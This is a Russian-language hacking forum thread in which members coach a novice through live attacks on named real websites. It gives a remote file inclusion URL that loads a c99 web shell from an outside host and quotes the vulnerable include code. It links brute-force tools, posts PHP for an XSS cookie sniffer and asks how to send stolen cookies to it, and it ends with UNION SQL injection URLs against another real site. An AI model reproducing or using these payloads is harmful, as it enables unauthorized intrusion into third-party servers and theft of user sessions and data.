странный чел - а где расширение файла? А что там внутри - мне гадать надо?) вот нормальный, рабочий шелл https://forum.antichat.ru/thread125103.html заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать) PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php
ты не так ввел)))надо так http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.txt что бы в конце было не пхп а тхт P.S. пл* у кого корявblе сообщение что аш раздуваются посты )))) если не понял то стукани в асю
Code: http://pashkela.narod.ru/progi/MySql4Bruter.rar - брутер mysql4 http://pashkela.narod.ru/progi/MySQL_column.rar - подбор кол-ва колонок не всегда пашут, т.к. нет замены /**/ на просто пробел или плюс и прочее. Readme в комплекте
Pashkela, спб за софт, но я так понял, что прога для поиска количесвта колнок подбирает только лишь принтабельный столбец, а сами колонки она игнорирует....)
Народ я умею проводить SQL-inj Но не умею PHP ПОдскажите можно ли тут что-то сделать ССылка вида http://www.сайт.ru/index.php?p=about'
pashkelka,haxtachak спасибо что разъяснили. Я нашол в нете shell c99. залил на народ и запустил. первый раз ничего не отбразилось. 2 раз когда подрдактировал $surl = "http://catenabrasil.com/portal/index.php?arq="; //link to this script, INCLUDE "?". чтото появилось, но работает очень жопно. вот взгляните: и при попытке открыть что либо выскакивает эта шняга. Warning: include_once(act=ls) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69 Warning: include_once() [function.include]: Failed opening 'act=ls' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69 PS обясните плиз новичку. я первый раз делаю такое модет кто даст линки на более простые шеллы и описание их конфига?
Дружище, я смотрю вчерашняя беседа прошла даром. Вот код из скрипта: PHP: <? $arq = $_REQUEST["arq"]; if ((isset($arq)) and ($arq != "")){ include_once($arq); } elseif (isset($_POST['keyGen'])){ include_once($arq); } else { include_once('empresa.php'); } ?> ЭТО ИНКЛУД!!! И ему абсолютно пофигу какое расширение и есть ли оно вообще. И уж тем-более на народе. ЗЫ Только не надо мне рассказывать , что при инклуде .php он исполнится на стороне того сервера, (я это как-бэ знаю). Народ это не тот случай, и не путай новичка пожалуйста
2 jokester: Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница" Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php Проверь плиз, может я ваще после выходных с катушек съехал) PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал В общем jokester прав как всегда) загвоздка была в том, чтобы с99 не был запороленный
jokester ..у меня тоже такая фигня была....но чем не факт сделать тхт? если получилось , работает)то смысл судить
HAXTA4OK Я уже несколько раз говорил, в чём разница. От непонимания возникают новые вопросы. Сделать тупо как показали, не поняв как это работает, это не выход. Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы
и вот ты думаешь что он понял что все ему написали? он просто по примеру сделал с тхт...дык и пусть потом пробует так!. а вот если не получится то спросит..а щас ему тут все понапишут и он вообще не поймет и бросит(не факт) P.S. он хоть с тхт понял)))) так и пусть делает так #################################### jokester Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы и вот ты думаешь что он понял что все ему написали? P.S.пусть идет по ступенькам на примерах ################################## main() на тебе шелл ..позаимствовал у mailbrush _http://bestquest.info/shell.txt
Люди помогите плиз. Надо написать самый примитивный снифире XSS на php. читал статью на ачате про XSS но снифер там какойто мудрённый, с шифрованием,с картинкой и т.д. надо простой сниф и всё может кто накатает. я вот накатал чтото похожее PHP: <?php $file="log.txt"; $data=date("d.m.Y"); $time=date("H.i"); $ip=trim($_SERVER['REMOTE_ADDR']); $agent=trim($_SERVER['HTTP_USER_AGENT']); $fo=fopen($file,"a"); $res="$data|$time|$ip|$agent"; $fw=fputs($fo,$res); fclose($fo); ?> но как ему передать куки этому скрипту?
Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер - картинка - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить. PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html
Помоги плиз изминитиь тот скрипт чтобы он через QUERY_STRING записывал в файл. и составить url на багу. помогите плиз
не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=%27rocit%27-- но ничего хорошего я не вижу.....
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables
Code: http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x726f636974-- мэджики включены